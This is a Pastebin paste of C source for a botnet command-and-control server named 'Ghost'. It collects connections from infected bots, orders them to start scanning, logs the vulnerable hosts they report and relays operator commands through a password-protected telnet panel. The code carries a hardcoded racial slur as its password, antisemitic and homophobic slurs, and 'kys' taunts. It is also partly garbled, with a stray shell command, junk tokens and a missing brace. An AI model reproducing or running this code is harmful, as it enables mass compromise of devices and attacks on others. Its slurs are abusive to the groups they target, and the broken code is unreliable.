API tools faq
paste
ThaRealUDP

Ghostt.c (Public Release Refreshed)

ThaRealUDP
Oct 18th, 2016
147
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 20.70 KB | None | 0 0
raw download clone embed print report
  1. nano /usr/include/bits/typesizes.h#include <stdio.h>
  2. #include <stdio.h>
  3. #include <stdlib.h>
  4. #include <string.h>
  5. #include <sys/types.h>
  6. #include <sys/socket.h>
  7. #include <netdb.h>
  8. #include <unistd.h>
  9. #include <time.h>
  10. #include <fcntl.h>
  11. #include <sys/epoll.h>
  12. #include <errno.h>
  13. #include <pthread.h>
  14. #include <signal.h>
  15.  
  16. #define MY_MGM_PASS "nigger"
  17. #define MY_MGM_PORT 8888
  18.  
  19. #define MAXFDS 10000
  20.  
  21. struct account {
  22. char id[20];
  23. char password[20];
  24. };
  25. static struct account accounts[10];
  26.  
  27. struct clientdata_t {
  28. uint32_t ip;
  29. char build[7];
  30. char connected;
  31. } clients[MAXFDS];
  32.  
  33. struct telnetdata_t {
  34. int connected;
  35. } managements[MAXFDS];
  36. static volatile FILE *telFD;
  37. static volatile FILE *fileFD;
  38. static volatile int epollFD = 0;
  39. static volatile int listenFD = 0;
  40. static volatile int managesConnected = 0;
  41. static volatile int TELFound = 0;
  42. static volatile int scannerreport;
  43. int fdgets(unsigned char *buffer, int bufferSize, int fd)
  44. {
  45. int total = 0, got = 1;
  46. while(got == 1 && total < bufferSize && *(buffer + total - 1) != '\n') { got = read(fd, buffer + total, 1); total++; }
  47. return got;
  48. }
  49. void trim(char *str)
  50. {
  51. int i;
  52. int begin = 0;
  53. int end = strlen(str) - 1;
  54. while (isspace(str[begin])) begin++;
  55. while ((end >= begin) && isspace(str[end])) end--;
  56. for (i = begin; i <= end; i++) str[i - begin] = str[i];
  57. str[i - begin] = '\0';
  58. }
  59.  
  60. static int make_socket_non_blocking (int sfd)
  61. {
  62. int flags, s;
  63. flags = fcntl (sfd, F_GETFL, 0);
  64. if (flags == -1)
  65. {
  66. perror ("fcntl");
  67. return -1;
  68. }
  69. flags |= O_NONBLOCK;
  70. /*
  71. F_SETFL (int)
  72. Set the file status flags to the value specified by arg. File access mode (O_RDONLY, O_WRONLY, O_RDWR) and file creation flags (i.e., O_CREAT, O_EXCL, O_NOCTTY, O_TRUNC) in arg are // yes yes ik Lizkebab
  73. ignored. On Linux this command can change only the O_APPEND, O_ASYNC, O_DIRECT, O_NOATIME, and O_NONBLOCK flags.
  74. */
  75. s = fcntl (sfd, F_SETFL, flags);
  76. if (s == -1)
  77. {
  78. perror ("fcntl");
  79. return -1;
  80. }
  81. return 0;
  82. }
  83.  
  84. static int create_and_bind (char *port)
  85. {
  86. struct addrinfo hints;
  87. struct addrinfo *result, *rp;
  88. int s, sfd;
  89. memset (&hints, 0, sizeof (struct addrinfo));
  90. hints.ai_family = AF_UNSPEC;
  91. hints.ai_socktype = SOCK_STREAM;
  92. hints.ai_flags = AI_PASSIVE;
  93. s = getaddrinfo (NULL, port, &hints, &result);
  94. if (s != 0)
  95. {
  96. fprintf (stderr, "getaddrinfo: %s\n", gai_strerror (s));
  97. return -1;
  98. }
  99. for (rp = result; rp != NULL; rp = rp->ai_next)
  100. {
  101. sfd = socket (rp->ai_family, rp->ai_socktype, rp->ai_protocol);
  102. if (sfd == -1) continue;
  103. int yes = 1;
  104. if ( setsockopt(sfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1 ) perror("setsockopt");
  105. s = bind (sfd, rp->ai_addr, rp->ai_addrlen);
  106. if (s == 0)
  107. {
  108. break;
  109. }
  110. close (sfd);
  111. }
  112. if (rp == NULL)
  113. {
  114. fprintf (stderr, "Could not bind\n");
  115. return -1;
  116. }
  117. freeaddrinfo (result);
  118. return sfd;
  119. }
  120. void broadcast(char *msg, int us, char *sender)
  121. {
  122. int sendMGM = 1;
  123. if(strcmp(msg, "PING") == 0) sendMGM = 0;
  124. char *wot = malloc(strlen(msg) + 10);
  125. memset(wot, 0, strlen(msg) + 10);
  126. strcpy(wot, msg);
  127. trim(wot);
  128. time_t rawtime;
  129. struct tm * timeinfo;
  130. time(&rawtime);
  131. timeinfo = localtime(&rawtime);
  132. char *timestamp = asctime(timeinfo);
  133. trim(timestamp);
  134. int i;
  135. for(i = 0; i < MAXFDS; i++)
  136. {
  137. if(i == us || (!clients[i].connected && (sendMGM == 0 || !managements[i].connected))) continue;
  138. if(sendMGM && managements[i].connected)
  139. {
  140. send(i, "\x1b[33m", 5, MSG_NOSIGNAL);
  141. send(i, sender, strlen(sender), MSG_NOSIGNAL);
  142. send(i, ": ", 2, MSG_NOSIGNAL);
  143. }
  144. printf("sent to fd: %d\n", i);
  145. send(i, msg, strlen(msg), MSG_NOSIGNAL);
  146. if(sendMGM && managements[i].connected) send(i, "\r\n\x1b[31m> \x1b[0m", 13, MSG_NOSIGNAL);
  147. else send(i, "\n", 1, MSG_NOSIGNAL);
  148. }
  149. free(wot);
  150. }
  151.  
  152. void *epollEventLoop(void *useless)
  153. {
  154. struct epoll_event event;
  155. struct epoll_event *events;
  156. int s;
  157. events = calloc (MAXFDS, sizeof event);
  158. while (1)
  159. {
  160. int n, i;
  161. n = epoll_wait (epollFD, events, MAXFDS, -1);
  162. for (i = 0; i < n; i++)
  163. {
  164. if ((events[i].events & EPOLLERR) || (events[i].events & EPOLLHUP) || (!(events[i].events & EPOLLIN)))
  165. {
  166. clients[events[i].data.fd].connected = 0;
  167. close(events[i].data.fd);
  168. continue;
  169. }
  170. else if (listenFD == events[i].data.fd)
  171. {
  172. while (1)
  173. {
  174. struct sockaddr in_addr;
  175. socklen_t in_len;
  176. int infd, ipIndex;
  177.  
  178. in_len = sizeof in_addr;
  179. infd = accept (listenFD, &in_addr, &in_len);
  180. if (infd == -1)
  181. {
  182. if ((errno == EAGAIN) || (errno == EWOULDBLOCK)) break;
  183. else
  184. {
  185. perror ("accept");
  186. break;
  187. }
  188. }
  189.  
  190. clients[infd].ip = ((struct sockaddr_in *)&in_addr)->sin_addr.s_addr;
  191.  
  192. int dup = 0;
  193. for(ipIndex = 0; ipIndex < MAXFDS; ipIndex++)
  194. {
  195. if(!clients[ipIndex].connected || ipIndex == infd) continue;
  196.  
  197. if(clients[ipIndex].ip == clients[infd].ip)
  198. {
  199. dup = 1;
  200. break;
  201. }
  202. }
  203.  
  204. if(dup)
  205. {
  206. printf("DUP Client - Terminating\n");
  207. if(send(infd, "!* GTFOFAG\n", 11, MSG_NOSIGNAL) == -1) { close(infd); continue; }
  208. if(send(infd, "DUP\n", 4, MSG_NOSIGNAL) == -1) { close(infd); continue; }
  209. close(infd);
  210. continue;
  211. }
  212.  
  213. s = make_socket_non_blocking (infd);
  214. if (s == -1) { close(infd); break; }
  215.  
  216. event.data.fd = infd;
  217. event.events = EPOLLIN | EPOLLET;
  218. s = epoll_ctl (epollFD, EPOLL_CTL_ADD, infd, &event);
  219. if (s == -1)
  220. {
  221. perror ("epoll_ctl");
  222. close(infd);
  223. break;
  224. }
  225.  
  226. clients[infd].connected = 1;
  227. send(infd, "!* Scanner On\n", 14, MSG_NOSIGNAL);
  228. send(infd, "!* kys\n", 11, MSG_NOSIGNAL);
  229. }
  230. continue;
  231. }
  232. else
  233. {
  234. int thefd = events[i].data.fd;
  235. struct clientdata_t *client = &(clients[thefd]);
  236. int done = 0;
  237. client->connected = 1;
  238. while (1)
  239. {
  240. ssize_t count;
  241. char buf[2048];
  242. memset(buf, 0, sizeof buf);
  243.  
  244. while(memset(buf, 0, sizeof buf) && (count = fdgets(buf, sizeof buf, thefd)) > 0)
  245. {
  246. if(strstr(buf, "\n") == NULL) { done = 1; break; }
  247. trim(buf);
  248. if(strcmp(buf, "PING") == 0) // basic IRC-like ping/pong challenge/response to see if server is alive
  249. {
  250. if(send(thefd, "PONG\n", 5, MSG_NOSIGNAL) == -1) { done = 1; break; } // response
  251. continue;
  252. }
  253. if(strstr(buf, "BUILD ") == buf)
  254. {
  255. char *build = strstr(buf, "BUILD ") + 6;
  256. if(strlen(build) > 6) { printf("build bigger then 6\n"); done = 1; break; }
  257. memset(client->build, 0, 7);
  258. strcpy(client->build, build);
  259. continue;
  260. }
  261. if(strstr(buf, "REPORT ") == buf) // received a report of a vulnerable system from a scan
  262. {
  263. char *line = strstr(buf, "REPORT ") + 7;
  264. fprintf(fileFD, "%s\n", line); // let's write it out to disk without checking what it is!
  265. fflush(fileFD);
  266. //TODO: automatically exploit that particular IP after scanning for dir and uploading correct arch stuffs.
  267. continue;
  268. }
  269. if(strcmp(buf, "PONG") == 0)
  270. {
  271. //should really add some checking or something but meh
  272. continue;
  273. }
  274.  
  275. printf("buf: \"%s\"\n", buf);
  276. }
  277.  
  278. if (count == -1)
  279. {
  280. if (errno != EAGAIN)
  281. {
  282. done = 1;
  283. }
  284. break;
  285. }
  286. else if (count == 0)
  287. {
  288. done = 1;
  289. break;
  290. }
  291. }
  292.  
  293. if (done)
  294. {
  295. client->connected = 0;
  296. close(thefd);
  297. }
  298. }
  299. }
  300. }
  301. }
  302. unsigned int clientsConnected()
  303. {
  304. int i = 0, total = 0;
  305. for(i = 0; i < MAXFDS; i++)
  306. {
  307. if(!clients[i].connected) continue;
  308. total++;
  309. }
  310.  
  311. return total;
  312. }
  313. void *titleWriter(void *sock)
  314. int thefd = (int)sock;
  315. char string[2048];
  316. while(1)
  317. {
  318. memset(string, 0, 2048);
  319. sprintf(string, "%c]0;Gay Bots connected: %d | Attacking Jews connected: %d%c", '\033', clientsConnected(), managesConnected, '\007');
  320. if(send(thefd, string, strlen(string), MSG_NOSIGNAL) == -1) return;
  321.  
  322. sleep(2);
  323. }
  324. }
  325.  
  326. int Search_in_File(char *str)
  327. {
  328. FILE *fp;
  329. int line_num = 0;
  330. int find_result = 0, find_line=0;
  331. char temp[512];
  332.  
  333. if((fp = fopen("login.txt", "r")) == NULL){
  334. return(-1);
  335. }
  336. while(fgets(temp, 512, fp) != NULL){
  337. if((strstr(temp, str)) != NULL){
  338. find_result++;
  339. find_line = line_num;
  340. }
  341. line_num++;
  342. }
  343. if(fp)
  344. fclose(fp);
  345.  
  346. if(find_result == 0)return 0;
  347.  
  348. return find_line;
  349. }
  350.  
  351. void *telnetWorker(void *sock)
  352. {
  353. char usernamez[80];
  354. int thefd = (int)sock;
  355. int find_line;
  356. managesConnected++;
  357. pthread_t title;
  358. char counter[2048];
  359. memset(counter, 0, 2048);
  360. char buf[2048];
  361. char* nickstring;Valac
  362. char* username;Valac
  363. char* password;Valac123
  364. memset(buf, 0, sizeof buf);
  365. char botnet[2048];
  366. memset(botnet, 0, 2048);
  367.  
  368. FILE *fp;
  369. int i=0;
  370. int c;
  371. fp=fopen("login.txt", "r"); // format: user pass
  372. while(!feof(fp))
  373. {
  374. c=fgetc(fp);
  375. ++i;
  376. }
  377. int j=0;
  378. rewind(fp);
  379. while(j!=i-1)
  380. {
  381. fscanf(fp, "%s %s", accounts[j].id, accounts[j].password);
  382. ++j;
  383. }
  384.  
  385. if(send(thefd, "\x1b[37mUsername:\x1b[30m", 23, MSG_NOSIGNAL) == -1) goto end;
  386. if(fdgets(buf, sizeof buf, thefd) < 1) goto end;
  387. trim(buf);
  388. sprintf(usernamez, buf);
  389. nickstring = ("%s", buf);
  390. find_line = Search_in_File(nickstring);
  391. if(strcmp(nickstring, accounts[find_line].id) == 0){
  392. if(send(thefd, "\x1b[37mPassword:\x1b[30m", 23, MSG_NOSIGNAL) == -1) goto end;
  393. if(fdgets(buf, sizeof buf, thefd) < 1) goto end;
  394. trim(buf);
  395. if(strcmp(buf, accounts[find_line].password) != 0) goto failed;
  396. memset(buf, 0, 2048);
  397. goto fak;
  398. }
  399. failed:
  400. if(send(thefd, "\033[1A", 5, MSG_NOSIGNAL) == -1) goto end;
  401. if(send(thefd, "\x1b[31mkyskyskyskyskyskyskyskyskyskyskyskykyskyskk\r\n", 44, MSG_NOSIGNAL) == -1) goto end;
  402. if(send(thefd, "\x1b[31m= Fuck You Bitch. =\r\n", 44, MSG_NOSIGNAL) == -1) goto end;
  403. if(send(thefd, "\x1b[31m= Wrong Details. =\r\n", 44, MSG_NOSIGNAL) == -1) goto end;
  404. if(send(thefd, "\x1b[31mkyskyskyskyskyskyskyskyskyskyskyskykyskyskysk\n", 43, MSG_NOSIGNAL) == -1) goto end;
  405. sleep(5);
  406. goto end;
  407. fak:
  408.  
  409. pthread_create(&title, NULL, &titleWriter, sock);
  410. char line1[80];
  411. char line2[80];
  412.  
  413. sprintf(line1, "= WELCOME TO THE \x1b[0;32mGHOST\x1b[0;31m =\r\n");
  414. sprintf(line2, "= Now with \x1b[0;32mActual \x1b[0;31mHackerSupport =\r\n"); ////sorry void i love u this is almost all your code in this section
  415.  
  416. if(send(thefd, "\x1b[0;31m=========================================\r\n", 52, MSG_NOSIGNAL) == -1) goto end;
  417. if(send(thefd, line1, strlen(line1), MSG_NOSIGNAL) == -1) goto end;
  418. if(send(thefd, line2, strlen(line2), MSG_NOSIGNAL) == -1) goto end;
  419. if(send(thefd, "=========================================\r\n\r\n> \x1b[0m", 51, MSG_NOSIGNAL) == -1) goto end;
  420. pthread_create(&title, NULL, &titleWriter, sock);
  421. managements[thefd].connected = 1;
  422.  
  423. while(fdgets(buf, sizeof buf, thefd) > 0)
  424. {
  425. if(strstr(buf, "!* STATUS"))
  426. {
  427. sprintf(botnet, "Telnet devices: %d | Telnet status: %d\r\n", TELFound, scannerreport);
  428. if(send(thefd, botnet, strlen(botnet), MSG_NOSIGNAL) == -1) return;
  429. }
  430. if(strstr(buf, "!* BOTS"))
  431. {
  432. sprintf(botnet, "Gay Bots connected: %d | Attacking Jews connected: %d\r\n", clientsConnected(), managesConnected);
  433. if(send(thefd, botnet, strlen(botnet), MSG_NOSIGNAL) == -1) return;
  434. }
  435. if(strstr(buf, ".logout"))
  436. {
  437. goto end;
  438. }
  439.  
  440.  
  441. trim(buf);
  442. if(send(thefd, "\x1b[31m> \x1b[0m", 11, MSG_NOSIGNAL) == -1) goto end;
  443. if(strlen(buf) == 0) continue;
  444. printf("%s: \"%s\"\n",accounts[find_line].id, buf);
  445. FILE *logFile;
  446. logFile = fopen("server.log", "a");
  447. fprintf(logFile, "%s: \"%s\"\n",accounts[find_line].id, buf);
  448. fclose(logFile);
  449. broadcast(buf, thefd, usernamez);
  450. memset(buf, 0, 2048);
  451. }
  452.  
  453. end: // cleanup dead socket
  454. managements[thefd].connected = 0;
  455. close(thefd);
  456. managesConnected--;
  457. }
  458.  
  459. void *telnetListener(void *useless)
  460. {
  461. int sockfd, newsockfd;
  462. socklen_t clilen;
  463. struct sockaddr_in serv_addr, cli_addr;
  464. sockfd = socket(AF_INET, SOCK_STREAM, 0);
  465. if (sockfd < 0) perror("ERROR opening socket");
  466. bzero((char *) &serv_addr, sizeof(serv_addr));
  467. serv_addr.sin_family = AF_INET;
  468. serv_addr.sin_addr.s_addr = INADDR_ANY;
  469. serv_addr.sin_port = htons(MY_MGM_PORT);
  470. if (bind(sockfd, (struct sockaddr *) &serv_addr, sizeof(serv_addr)) < 0) perror("ERROR on binding");
  471. listen(sockfd,5);
  472. clilen = sizeof(cli_addr);
  473. while(1)
  474. {
  475. newsockfd = accept(sockfd, (struct sockaddr *) &cli_addr, &clilen);
  476. if (newsockfd < 0) perror("ERROR on accept");
  477. pthread_t thread;
  478. pthread_create( &thread, NULL, &telnetWorker, (void *)newsockfd);
  479. }
  480. }
  481.  
  482. int main (int argc, char *argv[])
  483. {
  484. signal(SIGPIPE, SIG_IGN); // ignore broken pipe errors sent from kernel
  485.  
  486. int s, threads;
  487. struct epoll_event event;
  488.  
  489. if (argc != 3)
  490. {
  491. fprintf (stderr, "Usage: %s [port] [threads]\n", argv[0]);
  492. exit (EXIT_FAILURE);
  493. }
  494. fileFD = fopen("output.txt", "a+");
  495. threads = atoi(argv[2]);
  496.  
  497. listenFD = create_and_bind (argv[1]);
  498. if (listenFD == -1) abort ();
  499.  
  500. s = make_socket_non_blocking (listenFD);
  501. if (s == -1) abort ();
  502.  
  503. s = listen (listenFD, SOMAXCONN);
  504. if (s == -1)
  505. {
  506. perror ("listen");
  507. abort ();
  508. }
  509.  
  510. epollFD = epoll_create1 (0);
  511. if (epollFD == -1)
  512. {
  513. perror ("epoll_create");
  514. abort ();
  515. }
  516.  
  517. event.data.fd = listenFD;
  518. event.events = EPOLLIN | EPOLLET;
  519. s = epoll_ctl (epollFD, EPOLL_CTL_ADD, listenFD, &event);
  520. if (s == -1)
  521. {
  522. perror ("epoll_ctl");
  523. abort ();
  524. }
  525.  
  526. pthread_t thread[threads + 2];
  527. while(threads--)
  528. {
  529. pthread_create( &thread[threads + 1], NULL, &epollEventLoop, (void *) NULL);
  530. }
  531.  
  532. pthread_create(&thread[0], NULL, &telnetListener, (void *)NULL);
  533.  
  534. while(1)
  535. {
  536. broadcast("PING", -1);
  537.  
  538. sleep(60);
  539. }
  540.  
  541. close (listenFD);
  542.  
  543. return EXIT_SUCCESS;
  544. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!